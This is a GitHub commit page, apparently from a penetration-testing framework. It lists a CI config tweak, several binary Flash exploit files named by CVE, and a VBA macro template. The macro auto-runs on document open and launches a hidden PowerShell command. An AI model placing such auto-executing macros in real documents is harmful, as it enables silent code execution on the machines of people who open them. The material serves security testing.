Skip to content

Commit 7d5af66

Browse files
author
Brent Cook
committed
Merge branch 'master' into land-5367-uuid-stagers
2 parents 7f59a74 + b74c162 commit 7d5af66

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

53 files changed

+1766
-486
lines changed

.travis.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,7 @@ before_script:
2222
- bundle exec rake db:migrate
2323
script:
2424
# fail build if db/schema.rb update is not committed
25-
- git diff --exit-code && bundle exec rake $RAKE_TASKS
25+
- git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
2626
sudo: false
2727
rvm:
2828
- '2.1.6'

data/exploits/CVE-2014-0556/msf.swf

-30 Bytes
Binary file not shown.

data/exploits/CVE-2014-0569/msf.swf

88 Bytes
Binary file not shown.

data/exploits/CVE-2014-8440/msf.swf

7 Bytes
Binary file not shown.

data/exploits/CVE-2015-0311/msf.swf

82 Bytes
Binary file not shown.

data/exploits/CVE-2015-0313/msf.swf

86 Bytes
Binary file not shown.

data/exploits/CVE-2015-0336/msf.swf

100755100644
2.48 KB
Binary file not shown.
340 Bytes
Binary file not shown.

data/exploits/CVE-2015-0359/msf.swf

127 Bytes
Binary file not shown.
Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
Sub %{sub_auto_open}()
2+
Dim %{var_powershell}
3+
%{var_powershell} = %{powershell}
4+
Call Shell(%{var_powershell}, vbHide)
5+
End Sub
6+
Sub AutoOpen()
7+
%{sub_auto_open}
8+
End Sub
9+
Sub Workbook_Open()
10+
%{sub_auto_open}
11+
End Sub
12+

0 commit comments

Comments
 (0)